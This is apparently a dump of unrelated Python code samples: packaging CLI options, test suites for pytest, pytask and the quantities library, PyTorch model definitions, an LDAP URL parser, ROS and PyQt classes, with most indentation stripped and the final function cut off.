def copied_docstring_function():
pass
self.assertEqual(original_docstring_function.__doc__, copied_docstring_function.__doc__) |
def add_shared_install_options(parser: argparse.ArgumentParser):
parser.add_argument('--user', action='store_true', default=None, help='Do a user-local install (default if site.ENABLE_USER_SITE is True)')
parser.add_argument('--env', action='store_false', dest='user', help='Install into sys.prefix (default if site.ENABLE_USER_SITE is False, i.e. in virtualenvs)')
parser.add_argument('--python', help='Target Python executable, if different from the one running flit')
parser.add_argument('--deps', choices=['all', 'production', 'develop', 'none'], default='all', help='Which set of dependencies to install. If --deps=develop, the extras dev, doc, and test are installed')
parser.add_argument('--only-deps', action='store_true', help='Install only dependencies of this package, and not the package itself')
parser.add_argument('--extras', default=(), type=(lambda l: (l.split(',') if l else ())), help='Install the dependencies of these (comma separated) extras additionally to the ones implied by --deps. --extras=all can be useful in combination with --deps=production, --deps=none precludes using --extras') |
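# A minimal sketch wiring the shared options into a parser, the way a
# subcommand might consume them.
import argparse

parser = argparse.ArgumentParser(prog='flit install')
add_shared_install_options(parser)
args = parser.parse_args(['--deps', 'production', '--extras', 'test,doc'])
print(args.deps, args.extras)  # production ['test', 'doc'] |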
class TestDrivenMilesCompositeMetric(unittest.TestCase):
def test_zero_miles(self) -> None:
metric_results: Dict[(str, torch.Tensor)] = {metrics.SimulatedDrivenMilesMetric.metric_name: torch.zeros(10)}
simulation_output = mock.Mock()
validation_results = mock.Mock()
dm_metric = cm.DrivenMilesCompositeMetric('total_driven_miles')
result = dm_metric.compute(metric_results, validation_results, simulation_output)
simulation_output.assert_not_called()
validation_results.assert_not_called()
self.assertEqual(result, 0.0)
def test_driven_miles(self) -> None:
driven_tensor_ones = torch.ones(10)
metric_results: Dict[(str, torch.Tensor)] = {metrics.SimulatedDrivenMilesMetric.metric_name: driven_tensor_ones}
simulation_output = mock.Mock()
validation_results = mock.Mock()
dm_metric = cm.DrivenMilesCompositeMetric('total_driven_miles')
result = dm_metric.compute(metric_results, validation_results, simulation_output)
simulation_output.assert_not_called()
validation_results.assert_not_called()
self.assertEqual(result, driven_tensor_ones.sum())
driven_tensor_monotonic = torch.arange(10)
metric_results[metrics.SimulatedDrivenMilesMetric.metric_name] = driven_tensor_monotonic
simulation_output.reset_mock()
validation_results.reset_mock()
result = dm_metric.compute(metric_results, validation_results, simulation_output)
simulation_output.assert_not_called()
validation_results.assert_not_called()
self.assertEqual(result, driven_tensor_monotonic.sum()) |
class DebugInfoCommand(Command):
name = 'debug info'
description = 'Shows debug information.'
def handle(self) -> int:
poetry_python_version = '.'.join((str(s) for s in sys.version_info[:3]))
self.line('')
self.line('<b>Poetry</b>')
self.line('\n'.join([f'<info>Version</info>: <comment>{self.poetry.VERSION}</>', f'<info>Python</info>: <comment>{poetry_python_version}</>']))
command = self.get_application().get('env info')
exit_code: int = command.run(self.io)
return exit_code |
@pytest.mark.parametrize('when', ['setup', 'call', 'teardown'])
def test_crashing_item(pytester, when) -> None:
code = dict(setup='', call='', teardown='')
code[when] = 'os._exit(1)'
p = pytester.makepyfile('\n import os\n import pytest\n\n @pytest.fixture\n def fix():\n {setup}\n yield\n {teardown}\n\n def test_crash(fix):\n {call}\n pass\n\n def test_ok():\n pass\n '.format(**code))
passes = (2 if (when == 'teardown') else 1)
result = pytester.runpytest('-n2', p)
result.stdout.fnmatch_lines(['*crashed*test_crash*', ('*1 failed*%d passed*' % passes)]) |
def get_user_field(question: str, default_value: Optional[str]=None, is_valid_answer: Optional[Callable]=None, convert_to: Optional[Callable]=None, fallback_message: Optional[str]=None) -> Any:
if (not question.endswith(' ')):
question = (question + ' ')
if (default_value is not None):
question = f'{question} [{default_value}] '
valid_answer = False
while (not valid_answer):
answer = input(question)
if ((default_value is not None) and (len(answer) == 0)):
answer = default_value
if (is_valid_answer is not None):
valid_answer = is_valid_answer(answer)
elif (convert_to is not None):
try:
answer = convert_to(answer)
valid_answer = True
except Exception:
valid_answer = False
else:
valid_answer = True
if (not valid_answer):
print(fallback_message)
return answer |
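# An interactive usage sketch: re-prompt until the answer parses as an int.
epochs = get_user_field(
    'How many epochs?',
    default_value='10',
    convert_to=int,
    fallback_message='Please enter a whole number.',
) |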
@with_fixtures(WebFixture)
def test_distinguishing_identical_field_names(web_fixture):
fixture = web_fixture
class ModelObject():
fields = ExposedNames()
fields.field_name = (lambda i: IntegerField())
model_object1 = ModelObject()
model_object2 = ModelObject()
class MyForm(Form):
events = ExposedNames()
events.an_event = (lambda i: Event(label='click me'))
def __init__(self, view, name):
super().__init__(view, name)
self.define_event_handler(self.events.an_event)
self.add_child(ButtonInput(self, self.events.an_event))
self.add_child(TextInput(self, model_object1.fields.field_name))
self.add_child(TextInput(self, model_object2.fields.field_name.with_discriminator('object2')))
wsgi_app = fixture.new_wsgi_app(child_factory=MyForm.factory('form'))
fixture.reahl_server.set_app(wsgi_app)
fixture.driver_browser.open('/')
fixture.driver_browser.type('//input[@type="text"][1]', '0')
fixture.driver_browser.type('//input[@type="text"][2]', '1')
fixture.driver_browser.click(XPath.button_labelled('click me'))
assert (model_object1.field_name == 0)
assert (model_object2.field_name == 1) |
@register_model
def caformer_m36_in21ft1k(pretrained=False, **kwargs):
model = MetaFormer(depths=[3, 12, 18, 3], dims=[96, 192, 384, 576], token_mixers=[SepConv, SepConv, Attention, Attention], head_fn=MlpHead, **kwargs)
model.default_cfg = default_cfgs['caformer_m36_in21ft1k']
if pretrained:
state_dict = torch.hub.load_state_dict_from_url(url=model.default_cfg['url'], map_location='cpu', check_hash=True)
model.load_state_dict(state_dict)
return model |
class LDAPUrlExtension():
def __init__(self, extensionStr=None, critical=0, extype=None, exvalue=None):
self.critical = critical
self.extype = extype
self.exvalue = exvalue
if extensionStr:
self._parse(extensionStr)
def _parse(self, extension):
extension = extension.strip()
if (not extension):
(self.extype, self.exvalue) = (None, None)
return
self.critical = (extension[0] == '!')
if (extension[0] == '!'):
extension = extension[1:].strip()
try:
(self.extype, self.exvalue) = extension.split('=', 1)
except ValueError:
(self.extype, self.exvalue) = (extension, None)
else:
self.exvalue = unquote(self.exvalue.strip())
self.extype = self.extype.strip()
def unparse(self):
if (self.exvalue is None):
return '{}{}'.format(('!' * (self.critical > 0)), self.extype)
else:
return '{}{}={}'.format(('!' * (self.critical > 0)), self.extype, quote((self.exvalue or '')))
def __str__(self):
return self.unparse()
def __repr__(self):
return '<{}.{} instance at {}: {}>'.format(self.__class__.__module__, self.__class__.__name__, hex(id(self)), self.__dict__)
def __eq__(self, other):
return ((self.critical == other.critical) and (self.extype == other.extype) and (self.exvalue == other.exvalue))
def __ne__(self, other):
return (not self.__eq__(other)) |
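# A parse round-trip sketch for the extension class above; a leading '!'
# marks the extension as critical.
ext = LDAPUrlExtension('!bindname=cn=admin')
assert ext.critical
assert ext.extype == 'bindname' and ext.exvalue == 'cn=admin'
print(ext.unparse()) |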
def makeCfdMeshImported(name='ImportedCFDMesh'):
doc = FreeCAD.ActiveDocument
obj = doc.addObject('Fem::FemMeshObjectPython', name)
_CaeMeshImported._CaeMeshImported(obj)
if FreeCAD.GuiUp:
from cfdguiobjects._ViewProviderCaeMesh import _ViewProviderCaeMesh
_ViewProviderCaeMesh(obj.ViewObject)
return obj |
class MemIfcRTL2FLAdapter(Component):
def construct(s, ReqType, RespType):
s.left = MemMinionIfcRTL(ReqType, RespType)
s.right = MemMasterIfcFL()
@update_once
def up_memifc_rtl_fl_blk():
if (s.left.req.en and s.left.resp.rdy):
if (s.left.req.msg.type_ == MemMsgType.READ):
resp = RespType(s.left.req.msg.type_, s.right.read(s.left.req.msg.addr))
elif (s.left.req.msg.type_ == MemMsgType.WRITE):
s.right.write(s.left.req.msg.addr, s.left.req.msg.data)
resp = RespType(s.left.req.msg.type_, 0)
else:
resp = RespType(s.left.req.msg.type_, s.left.req.msg.opaque, 0, s.left.req.msg.len, s.right.amo(s.left.req.msg.type_, s.left.req.msg.addr, s.left.req.msg.len, s.left.req.msg.data))
s.left.resp.en = Bits1(1)
s.left.resp.msg = resp
@update
def up_memifc_rtl_fl_rdy():
s.left.req.rdy = s.left.resp.rdy |
@window.event
def on_draw():
window.clear()
glLoadIdentity()
glLightfv(GL_LIGHT0, GL_POSITION, lightfv((- 40.0), 200.0, 100.0, 0.0))
glLightfv(GL_LIGHT0, GL_AMBIENT, lightfv(0.2, 0.2, 0.2, 1.0))
glLightfv(GL_LIGHT0, GL_DIFFUSE, lightfv(0.5, 0.5, 0.5, 1.0))
glEnable(GL_LIGHT0)
glEnable(GL_LIGHTING)
glEnable(GL_COLOR_MATERIAL)
glEnable(GL_DEPTH_TEST)
glShadeModel(GL_SMOOTH)
glMatrixMode(GL_MODELVIEW)
glTranslated(0, 0.8, (- 20))
glRotatef((- 66.5), 0, 0, 1)
glRotatef(rotation, 1, 0, 0)
glRotatef(90, 0, 0, 1)
glRotatef(0, 0, 1, 0)
visualization.draw(meshes) |
class ObjectMapping():
_models = morefusion.datasets.YCBVideoModels()
def __init__(self):
self.reset()
self._n_votes = rospy.get_param('~n_votes', 3)
self._base_frame = rospy.get_param('~frame_id', 'map')
self._pub = rospy.Publisher('~output/poses', ObjectPoseArray, queue_size=1, latch=True)
self._pub_grids = rospy.Publisher('~output/grids', VoxelGridArray, queue_size=1, latch=True)
self._tf_listener = tf.TransformListener(cache_time=rospy.Duration(30))
self._sub = rospy.Subscriber('~input/poses', ObjectPoseArray, self._callback, queue_size=1)
self._sub_grids = rospy.Subscriber('~input/grids', VoxelGridArray, self._callback_grids, queue_size=1)
self._sub_remove = rospy.Subscriber('~input/remove', ObjectClassArray, self._callback_remove, queue_size=1)
self._srv_reset = rospy.Service('~reset', Empty, self._callback_reset)
self._lock = threading.Lock()
def reset(self):
self._objects = {}
self._instance_ids_removed = set()
self._reset_stamp = rospy.Time.now()
def _callback_reset(self, req):
self._lock.acquire()
self.reset()
self._pub.publish(ObjectPoseArray())
self._pub_grids.publish(VoxelGridArray())
self._lock.release()
return EmptyResponse()
def _callback_grids(self, grids_msg):
if (grids_msg.header.stamp < self._reset_stamp):
return
self._lock.acquire()
out_msg = copy.deepcopy(grids_msg)
out_msg.grids = []
for grid in grids_msg.grids:
if ((grid.instance_id in self._objects) and self._objects[grid.instance_id].is_spawned):
continue
out_msg.grids.append(grid)
self._pub_grids.publish(out_msg)
self._lock.release()
def _callback_remove(self, cls_msg):
if (cls_msg.header.stamp < self._reset_stamp):
return
for cls in cls_msg.classes:
self._instance_ids_removed.add(cls.instance_id)
self._publish_poses(cls_msg.header.stamp)
def _publish_poses(self, stamp):
out_msg = ObjectPoseArray()
out_msg.header.stamp = stamp
out_msg.header.frame_id = self._base_frame
for (ins_id, obj) in self._objects.items():
if (ins_id in self._instance_ids_removed):
continue
if (not obj.validate()):
continue
pose = ObjectPose(instance_id=ins_id, class_id=obj.class_id)
T_cad2base = obj.pose
translation = ttf.translation_from_matrix(T_cad2base)
quaternion = ttf.quaternion_from_matrix(T_cad2base)
pose.pose.position.x = translation[0]
pose.pose.position.y = translation[1]
pose.pose.position.z = translation[2]
pose.pose.orientation.w = quaternion[0]
pose.pose.orientation.x = quaternion[1]
pose.pose.orientation.y = quaternion[2]
pose.pose.orientation.z = quaternion[3]
out_msg.poses.append(pose)
self._pub.publish(out_msg)
def _callback(self, poses_msg):
if (poses_msg.header.stamp < self._reset_stamp):
return
try:
self._tf_listener.waitForTransform(target_frame=self._base_frame, source_frame=poses_msg.header.frame_id, time=poses_msg.header.stamp, timeout=rospy.Duration(0.1))
except Exception as e:
rospy.logerr(e)
return
(translation, quaternion) = self._tf_listener.lookupTransform(target_frame=self._base_frame, source_frame=poses_msg.header.frame_id, time=poses_msg.header.stamp)
translation = np.asarray(translation)
quaternion = np.asarray(quaternion)[[3, 0, 1, 2]]
T_cam2base = morefusion.functions.transformation_matrix(quaternion, translation).array
self._lock.acquire()
for pose in poses_msg.poses:
instance_id = pose.instance_id
class_id = pose.class_id
(quaternion, translation) = morefusion.ros.from_ros_pose(pose.pose)
T_cad2cam = morefusion.functions.transformation_matrix(quaternion, translation).array
T_cad2base = (T_cam2base @ T_cad2cam)
if (instance_id in self._objects):
self._objects[instance_id].append_pose(T_cad2base)
else:
self._objects[instance_id] = Object(class_id=class_id, pcd=self._models.get_pcd(class_id), is_symmetric=(class_id in morefusion.datasets.ycb_video.class_ids_symmetric), n_votes=self._n_votes)
self._objects[instance_id].append_pose(T_cad2base)
self._publish_poses(stamp=poses_msg.header.stamp)
self._lock.release() |
class StructureMixIn(object):
def __str__(self):
lines = []
for (field_name, _) in getattr(self, '_fields_', []):
lines.append(('%20s\t%s' % (field_name, getattr(self, field_name))))
return '\n'.join(lines)
def __eq__(self, other):
fields = getattr(self, '_fields_', [])
if isinstance(other, Struct):
try:
if (len(fields) != len(getattr(other, '_fields_', []))):
return False
for (field_name, _) in fields:
if (getattr(self, field_name) != getattr(other, field_name)):
return False
return True
except AttributeError:
return False
elif isinstance(other, (list, tuple)):
if (len(fields) != len(other)):
return False
try:
for (i, (field_name, _)) in enumerate(fields):
if (getattr(self, field_name) != other[i]):
return False
return True
except Exception:
return False
return False
def __ne__(self, other):
return (not self.__eq__(other))
__hash__ = None |
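# A sketch applying the mix-in to a ctypes structure; comparison against a
# plain tuple goes through the __eq__ defined above.
import ctypes

class Point(StructureMixIn, ctypes.Structure):
    _fields_ = [('x', ctypes.c_int), ('y', ctypes.c_int)]

p = Point(1, 2)
assert p == (1, 2)
print(p) |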
class Self_Attn(nn.Module):
def __init__(self, in_dim, latent_dim=8):
super(Self_Attn, self).__init__()
self.channel_in = in_dim
self.channel_latent = (in_dim // latent_dim)
self.query_conv = nn.Conv2d(in_channels=in_dim, out_channels=(in_dim // latent_dim), kernel_size=1)
self.key_conv = nn.Conv2d(in_channels=in_dim, out_channels=(in_dim // latent_dim), kernel_size=1)
self.value_conv = nn.Conv2d(in_channels=in_dim, out_channels=in_dim, kernel_size=1)
self.gamma = nn.Parameter(torch.zeros(1))
self.softmax = nn.Softmax(dim=(- 1))
def forward(self, x):
(batchsize, C, height, width) = x.size()
proj_query = self.query_conv(x).view(batchsize, (- 1), (height * width)).permute(0, 2, 1)
proj_key = self.key_conv(x).view(batchsize, (- 1), (height * width))
energy = torch.bmm(proj_query, proj_key)
attention = self.softmax(energy)
proj_value = self.value_conv(x).view(batchsize, (- 1), (height * width))
out = torch.bmm(proj_value, attention.permute(0, 2, 1))
out = out.view(batchsize, C, height, width)
out = ((self.gamma * out) + x)
return out |
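# A quick shape check for the self-attention block above (assumes torch and
# torch.nn as nn are in scope for the class); because gamma is initialized
# to zero, the module starts out as an identity mapping.
import torch

attn = Self_Attn(in_dim=64)
x = torch.randn(2, 64, 16, 16)
out = attn(x)
assert out.shape == x.shape
assert torch.allclose(out, x)  # gamma == 0 at init |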
@dataclasses.dataclass
class Request():
first_party_url: Optional[QUrl]
request_url: QUrl
is_blocked: bool = False
resource_type: Optional[ResourceType] = None
def block(self) -> None:
self.is_blocked = True
def redirect(self, url: QUrl, *, ignore_unsupported: bool=False) -> None:
raise NotImplementedError |
@pytest.mark.end_to_end()
def test_dry_run_skipped_successful(runner, tmp_path):
source = '\n import pytask\n\n @pytask.mark.produces("out.txt")\n def task_example(produces):\n produces.touch()\n '
tmp_path.joinpath('task_example.py').write_text(textwrap.dedent(source))
result = runner.invoke(cli, [tmp_path.as_posix()])
assert (result.exit_code == ExitCode.OK)
assert ('1 Succeeded' in result.output)
result = runner.invoke(cli, ['--dry-run', tmp_path.as_posix()])
assert (result.exit_code == ExitCode.OK)
assert ('1 Skipped because unchanged' in result.output) |
@pytest.mark.parametrize('x, cohort, n, axis', [_random_cohort_data((20,), n=3, axis=0), _random_cohort_data((20, 20), n=2, axis=0, dtype=np.float32), _random_cohort_data((10, 10), n=2, axis=(- 1), scale=30, dtype=np.int16), _random_cohort_data((20, 20), n=3, axis=(- 1), missing=0.3), _random_cohort_data((7, 103, 4), n=5, axis=1, scale=7, missing=0.3), _random_cohort_data(((3, 4), (50, 50, 3), 4), n=5, axis=1, scale=7, dtype=np.uint8), _random_cohort_data(((6, 6), (50, 50, 7), (3, 1)), n=5, axis=1, scale=7, missing=0.3)])
@pytest.mark.parametrize('reduction, func', [(cohort_sum, np.sum), (cohort_nansum, np.nansum), (cohort_mean, np.mean), (cohort_nanmean, np.nanmean)])
def test_cohort_reductions(reduction, func, x, cohort, n, axis):
expect = _cohort_reduction(func, x, cohort, n, axis=axis)
actual = reduction(x, cohort, n, axis=axis)
np.testing.assert_array_almost_equal(expect, actual) |
class TestUmath(TestCase):
    @property
    def q(self):
return ([1, 2, 3, 4] * pq.J)
def test_prod(self):
self.assertQuantityEqual(np.prod(self.q), (24 * (pq.J ** 4)))
def test_sum(self):
self.assertQuantityEqual(np.sum(self.q), (10 * pq.J))
def test_nansum(self):
c = ([1, 2, 3, np.nan] * pq.m)
self.assertQuantityEqual(np.nansum(c), (6 * pq.m))
def test_cumprod(self):
self.assertRaises(ValueError, np.cumprod, self.q)
q = ([10, 0.1, 5, 50] * pq.dimensionless)
self.assertQuantityEqual(np.cumprod(q), [10, 1, 5, 250])
def test_cumsum(self):
self.assertQuantityEqual(np.cumsum(self.q), ([1, 3, 6, 10] * pq.J))
def test_diff(self):
self.assertQuantityEqual(np.diff(self.q, 1), ([1, 1, 1] * pq.J))
    def test_ediff1d(self):
        self.assertQuantityEqual(np.ediff1d(self.q), ([1, 1, 1] * pq.J))
def test_linspace(self):
self.assertQuantityEqual(np.linspace(self.q[0], self.q[(- 1)], 4), self.q)
def test_gradient(self):
try:
l = np.gradient(([[1, 1], [3, 4]] * pq.J), (1 * pq.m))
self.assertQuantityEqual(l[0], (([[2.0, 3.0], [2.0, 3.0]] * pq.J) / pq.m))
self.assertQuantityEqual(l[1], (([[0.0, 0.0], [1.0, 1.0]] * pq.J) / pq.m))
except ValueError as e:
raise self.failureException(e)
def test_cross(self):
a = ([3, (- 3), 1] * pq.kPa)
b = ([4, 9, 2] * (pq.m ** 2))
self.assertQuantityEqual(np.cross(a, b), (([(- 15), (- 2), 39] * pq.kPa) * (pq.m ** 2)))
def test_trapz(self):
self.assertQuantityEqual(np.trapz(self.q, dx=(1 * pq.m)), ((7.5 * pq.J) * pq.m))
def test_sinh(self):
q = ([1, 2, 3, 4, 6] * pq.radian)
self.assertQuantityEqual(np.sinh(q), np.sinh(q.magnitude))
def test_arcsinh(self):
q = ([1, 2, 3, 4, 6] * pq.dimensionless)
self.assertQuantityEqual(np.arcsinh(q), (np.arcsinh(q.magnitude) * pq.rad))
def test_cosh(self):
q = ([1, 2, 3, 4, 6] * pq.radian)
self.assertQuantityEqual(np.cosh(q), (np.cosh(q.magnitude) * pq.dimensionless))
def test_arccosh(self):
q = ([1, 2, 3, 4, 6] * pq.dimensionless)
self.assertQuantityEqual(np.arccosh(q), (np.arccosh(q.magnitude) * pq.rad))
def test_tanh(self):
q = ([1, 2, 3, 4, 6] * pq.rad)
self.assertQuantityEqual(np.tanh(q), np.tanh(q.magnitude))
def test_arctanh(self):
q = ([0.01, 0.5, 0.6, 0.8, 0.99] * pq.dimensionless)
self.assertQuantityEqual(np.arctanh(q), (np.arctanh(q.magnitude) * pq.rad))
def test_around(self):
self.assertQuantityEqual(np.around(([0.5, 1.5, 2.5, 3.5, 4.5] * pq.J)), ([0.0, 2.0, 2.0, 4.0, 4.0] * pq.J))
self.assertQuantityEqual(np.around(([1, 2, 3, 11] * pq.J), decimals=1), ([1, 2, 3, 11] * pq.J))
self.assertQuantityEqual(np.around(([1, 2, 3, 11] * pq.J), decimals=(- 1)), ([0, 0, 0, 10] * pq.J))
def test_round(self):
self.assertQuantityEqual(np.round(([0.5, 1.5, 2.5, 3.5, 4.5] * pq.J)), ([0.0, 2.0, 2.0, 4.0, 4.0] * pq.J))
self.assertQuantityEqual(np.round(([1, 2, 3, 11] * pq.J), decimals=1), ([1, 2, 3, 11] * pq.J))
self.assertQuantityEqual(np.round(([1, 2, 3, 11] * pq.J), decimals=(- 1)), ([0, 0, 0, 10] * pq.J))
def test_rint(self):
a = ([(- 4.1), (- 3.6), (- 2.5), 0.1, 2.5, 3.1, 3.9] * pq.m)
self.assertQuantityEqual(np.rint(a), ([(- 4.0), (- 4.0), (- 2.0), 0.0, 2.0, 3.0, 4.0] * pq.m))
def test_floor(self):
a = ([(- 1.7), (- 1.5), (- 0.2), 0.2, 1.5, 1.7, 2.0] * pq.m)
self.assertQuantityEqual(np.floor(a), ([(- 2.0), (- 2.0), (- 1.0), 0.0, 1.0, 1.0, 2.0] * pq.m))
def test_ceil(self):
a = ([(- 1.7), (- 1.5), (- 0.2), 0.2, 1.5, 1.7, 2.0] * pq.m)
self.assertQuantityEqual(np.ceil(a), ([(- 1.0), (- 1.0), (- 0.0), 1.0, 2.0, 2.0, 2.0] * pq.m))
def test_fix(self):
self.assertQuantityEqual(np.fix((3.14 * pq.degF)), (3.0 * pq.degF))
self.assertQuantityEqual(np.fix((3.0 * pq.degF)), (3.0 * pq.degF))
self.assertQuantityEqual(np.fix(([2.1, 2.9, (- 2.1), (- 2.9)] * pq.degF)), ([2.0, 2.0, (- 2.0), (- 2.0)] * pq.degF))
def test_exp(self):
self.assertQuantityEqual(np.exp((1 * pq.dimensionless)), np.e)
self.assertRaises(ValueError, np.exp, (1 * pq.m))
def test_exp2(self):
self.assertQuantityEqual(np.exp2((1 * pq.dimensionless)), 2.0)
self.assertRaises(ValueError, np.exp2, (1 * pq.m))
def test_log(self):
self.assertQuantityEqual(np.log((1 * pq.dimensionless)), 0)
self.assertRaises(ValueError, np.log, (1 * pq.m))
def test_log10(self):
self.assertQuantityEqual(np.log10((1 * pq.dimensionless)), 0)
self.assertRaises(ValueError, np.log10, (1 * pq.m))
def test_log2(self):
self.assertQuantityEqual(np.log2((1 * pq.dimensionless)), 0)
self.assertRaises(ValueError, np.log2, (1 * pq.m))
def test_expm1(self):
self.assertQuantityEqual(np.expm1((1 * pq.dimensionless)), (np.e - 1))
self.assertRaises(ValueError, np.expm1, (1 * pq.m))
def test_log1p(self):
self.assertQuantityEqual(np.log1p((0 * pq.dimensionless)), 0)
self.assertRaises(ValueError, np.log1p, (1 * pq.m))
def test_sin(self):
self.assertQuantityEqual(np.sin(((np.pi / 2) * pq.radian)), 1)
self.assertRaises(ValueError, np.sin, (1 * pq.m))
def test_arcsin(self):
self.assertQuantityEqual(np.arcsin((1 * pq.dimensionless)), ((np.pi / 2) * pq.radian))
self.assertRaises(ValueError, np.arcsin, (1 * pq.m))
def test_cos(self):
self.assertQuantityEqual(np.cos((np.pi * pq.radians)), (- 1))
self.assertRaises(ValueError, np.cos, (1 * pq.m))
def test_arccos(self):
self.assertQuantityEqual(np.arccos((1 * pq.dimensionless)), (0 * pq.radian))
self.assertRaises(ValueError, np.arccos, (1 * pq.m))
def test_tan(self):
self.assertQuantityEqual(np.tan((0 * pq.radian)), 0)
self.assertRaises(ValueError, np.tan, (1 * pq.m))
def test_arctan(self):
self.assertQuantityEqual(np.arctan((0 * pq.dimensionless)), (0 * pq.radian))
self.assertRaises(ValueError, np.arctan, (1 * pq.m))
def test_arctan2(self):
self.assertQuantityEqual(np.arctan2((0 * pq.dimensionless), (0 * pq.dimensionless)), 0)
self.assertQuantityEqual(np.arctan2((3 * pq.V), (3 * pq.V)), (np.radians(45) * pq.dimensionless))
self.assertRaises((TypeError, ValueError), np.arctan2, ((1 * pq.m), (1 * pq.m)))
def test_hypot(self):
self.assertQuantityEqual(np.hypot((3 * pq.m), (4 * pq.m)), (5 * pq.m))
self.assertRaises(ValueError, np.hypot, (1 * pq.m), (2 * pq.J))
def test_degrees(self):
self.assertQuantityEqual(np.degrees((6 * pq.radians)), (6 * pq.radians).rescale(pq.degree))
self.assertRaises(ValueError, np.degrees, (0 * pq.degree))
def test_radians(self):
self.assertQuantityEqual(np.radians((6 * pq.degree)), (6 * pq.degree).rescale(pq.radian))
self.assertRaises(ValueError, np.radians, (0 * pq.radians))
def test_unwrap(self):
self.assertQuantityEqual(np.unwrap(([0, (3 * np.pi)] * pq.radians)), [0, np.pi])
self.assertQuantityEqual(np.unwrap(([0, 540] * pq.deg)), ([0, 180] * pq.deg))
def test_equal(self):
arr1 = ((1, 1) * pq.m)
arr2 = ((1.0, 1.0) * pq.m)
self.assertTrue(np.all(np.equal(arr1, arr2)))
self.assertFalse(np.all(np.equal(arr1, (arr2 * 2))))
def test_not_equal(self):
arr1 = ((1, 1) * pq.m)
arr2 = ((1.0, 1.0) * pq.m)
self.assertTrue(np.all(np.not_equal(arr1, (arr2 * 2))))
self.assertFalse(np.all(np.not_equal(arr1, arr2)))
def test_less(self):
arr1 = ((1, 1) * pq.m)
arr2 = ((1.0, 1.0) * pq.m)
self.assertTrue(np.all(np.less(arr1, (arr2 * 2))))
self.assertFalse(np.all(np.less((arr1 * 2), arr2)))
def test_less_equal(self):
arr1 = ((1, 1) * pq.m)
arr2 = ((1.0, 2.0) * pq.m)
self.assertTrue(np.all(np.less_equal(arr1, arr2)))
self.assertFalse(np.all(np.less_equal(arr2, arr1)))
def test_greater(self):
arr1 = ((1, 1) * pq.m)
arr2 = ((1.0, 2.0) * pq.m)
self.assertTrue(np.all(np.greater((arr2 * 1.01), arr1)))
self.assertFalse(np.all(np.greater(arr2, arr1)))
def test_greater_equal(self):
arr1 = ((1, 1) * pq.m)
arr2 = ((1.0, 2.0) * pq.m)
self.assertTrue(np.all(np.greater_equal(arr2, arr1)))
self.assertFalse(np.all(np.greater_equal((arr2 * 0.99), arr1))) |
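# Hedged sketch of the `assertQuantityEqual` helper these tests lean on (the
# real mixin lives elsewhere in the quantities test suite): compare magnitudes
# after rescaling both operands to a common unit.
import numpy as np
import quantities as pq

def assert_quantity_equal(q1, q2):
    (q1, q2) = (pq.Quantity(q1), pq.Quantity(q2))
    np.testing.assert_array_almost_equal(q1.magnitude, q2.rescale(q1.units).magnitude) |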
class ResourceDatabaseGenericModel(QtCore.QAbstractTableModel):
def __init__(self, db: ResourceDatabase, resource_type: ResourceType):
super().__init__()
self.db = db
self.resource_type = resource_type
self.allow_edits = True
def _get_items(self):
return self.db.get_by_type(self.resource_type)
def set_allow_edits(self, value: bool):
self.beginResetModel()
self.allow_edits = value
self.endResetModel()
def all_columns(self) -> list[FieldDefinition]:
return GENERIC_FIELDS
def headerData(self, section: int, orientation: QtCore.Qt.Orientation, role: int=...) -> typing.Any:
if (role != Qt.DisplayRole):
return None
if (orientation != Qt.Horizontal):
return section
return self.all_columns()[section].display_name
def rowCount(self, parent: QtCore.QModelIndex=...) -> int:
result = len(self._get_items())
if self.allow_edits:
result += 1
return result
def columnCount(self, parent: QtCore.QModelIndex=...) -> int:
return len(self.all_columns())
def data(self, index: QtCore.QModelIndex, role: int=...) -> typing.Any:
if (role not in {Qt.DisplayRole, Qt.EditRole}):
return None
all_items = self._get_items()
if (index.row() < len(all_items)):
resource = all_items[index.row()]
field = self.all_columns()[index.column()]
return field.to_qt(getattr(resource, field.field_name))
elif (role == Qt.DisplayRole):
if (index.column() == 0):
return 'New...'
else:
return ''
def setData(self, index: QtCore.QModelIndex, value: typing.Any, role: int=...) -> bool:
if (role == Qt.ItemDataRole.EditRole):
all_items = self._get_items()
if (index.row() < len(all_items)):
resource = all_items[index.row()]
field = self.all_columns()[index.column()]
(valid, new_value) = field.from_qt(value)
if valid:
all_items[index.row()] = dataclasses.replace(resource, **{field.field_name: new_value})
self.dataChanged.emit(index, index, [Qt.ItemDataRole.DisplayRole])
return True
elif value:
return self.append_item(self._create_item(value))
return False
def _create_item(self, short_name) -> ResourceInfo:
return SimpleResourceInfo(self.db.first_unused_resource_index(), short_name, short_name, self.resource_type)
def append_item(self, resource: ResourceInfo) -> bool:
assert (resource.resource_index == self.db.first_unused_resource_index())
row = self.rowCount()
self.beginInsertRows(QtCore.QModelIndex(), (row + 1), (row + 1))
self._get_items().append(resource)
self.endInsertRows()
return True
def flags(self, index: QtCore.QModelIndex) -> QtCore.Qt.ItemFlags:
result = (Qt.ItemFlag.ItemIsEnabled | Qt.ItemFlag.ItemIsSelectable)
if self.allow_edits:
if (index.row() == len(self._get_items())):
if (index.column() == 0):
result |= Qt.ItemFlag.ItemIsEditable
elif (index.column() > 0):
result |= Qt.ItemFlag.ItemIsEditable
return result |
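# Hedged usage sketch: wiring the model to a table view. Assumes a running
# QApplication, the QtWidgets import used elsewhere in this module, an
# existing ResourceDatabase instance `db`, and an illustrative ResourceType.
model = ResourceDatabaseGenericModel(db, ResourceType.ITEM)
view = QtWidgets.QTableView()
view.setModel(model)
model.set_allow_edits(False)  # hides the trailing 'New...' editor row |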
def names_modified_in_lvalue(lvalue: Lvalue) -> list[NameExpr]:
    """Recursively collect the names that an assignment target writes to,
    descending through star, list, and tuple targets."""
    if isinstance(lvalue, NameExpr):
return [lvalue]
elif isinstance(lvalue, StarExpr):
return names_modified_in_lvalue(lvalue.expr)
elif isinstance(lvalue, (ListExpr, TupleExpr)):
result: list[NameExpr] = []
for item in lvalue.items:
result += names_modified_in_lvalue(item)
return result
return [] |
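# Hedged sketch exercising the helper with hand-built mypy nodes (assumes
# mypy's internal constructors, whose signatures can shift between versions):
from mypy.nodes import ListExpr, NameExpr, StarExpr

lvalue = ListExpr([NameExpr('a'), StarExpr(NameExpr('b'))])
assert ([e.name for e in names_modified_in_lvalue(lvalue)] == ['a', 'b']) |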
def test_fixed_time_dependent_ding():
ocp = prepare_ocp(model=Model(time_as_states=False), n_stim=10, n_shooting=10, final_time=1, time_bimapping=False, use_sx=True)
sol = ocp.solve()
    (force_vector, cn_vector, time_vector) = result_vectors(sol)
    # Smoke check only: asserts nothing, just verifies solving and plotting run without raising
    plt.plot(time_vector, force_vector)
    plt.plot(time_vector, cn_vector) |
def test_initialize():
rnd = np.random.RandomState(0)
